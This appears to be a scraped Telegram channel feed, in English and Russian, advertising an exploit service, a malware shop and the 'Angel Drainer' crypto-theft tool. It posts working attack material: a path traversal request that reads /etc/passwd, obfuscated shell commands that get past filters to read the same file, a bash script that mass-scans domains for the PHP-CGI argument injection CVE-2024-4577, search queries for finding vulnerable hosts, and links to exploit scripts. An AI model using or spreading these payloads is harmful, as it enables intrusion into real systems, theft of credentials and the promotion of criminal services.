Exploit Service

CVE-2024-34470 HSC MailInspector POC: GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd FOFA: title=="..:: HSC MailInspector ::.." Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

BYPASS

cat ${HOME:0:1}etc${HOME:0:1}passwd

`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`

cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

cat `xxd -r -ps <(echo 2f6574632f706173737764)`

Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-30078 win RCE wi-fi New Wi-Fi Takeover Attack—All Windows Users Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-4577 Argument Injection in PHP-CGI ДОПОЛНЕНИЕ к предыдущему посту BASH: #!/bin/bash # Function to check vulnerability for a domain check_vulnerability() { local domain=$1 local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \ -H "User-Agent: curl/8.3.0" \ -H "Accept: */*" \ -H "Content-Length: 23" \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Connection: keep-alive" \ --data "<?php phpinfo(); ?>" \ --max-time 10) if [[ $response == *"PHP Version"* ]]; then echo "$domain: Vulnerable" fi } # Main function to iterate over domains main() { local file=$1 while IFS= read -r domain || [ -n "$domain" ]; do check_vulnerability "$domain" done < "$file" } # Check if the file argument is provided if [ "$#" -ne 1 ]; then echo "Usage: $0 <domain_list_file>" exit 1 fi # Call the main function with the domain list file main "$1" * Сохраняйте скрипт и по списку доменов: ./CVE-2024-4577_script.sh /path/to/domains-list Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-4577 Argument Injection in PHP-CGI При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда PHP-CGI работает на платформе Windows и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации. https://en.fofa.info/result?qbase64=YXBwPSJYQU1QUCI%3D (610,604 хостов) Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-27348 RCE в Apache HugeGraph Server Usage: python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute" https://github.com/kljunowsky/CVE-2024-27348 Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-27822 macOS PackageKit LPE Для версий: macOS 14.5 Beta 1 (23F5049f) and older macOS 13.6.6 (22G630) and older macOS 12.7.4 (21H1123) and older Any version of macOS 11 or older https://khronokernel.com/macos/2024/06/03/CVE-2024-27822.html https://khronokernel.com/Binaries/Apple%20PackageKit/pkg_exploit.py Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-36801 SemСms sql injection для версии Semcms v 4.8 https://hackyboiz.github.io/2024/06/05/pwndorei/2024-06-05/ Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport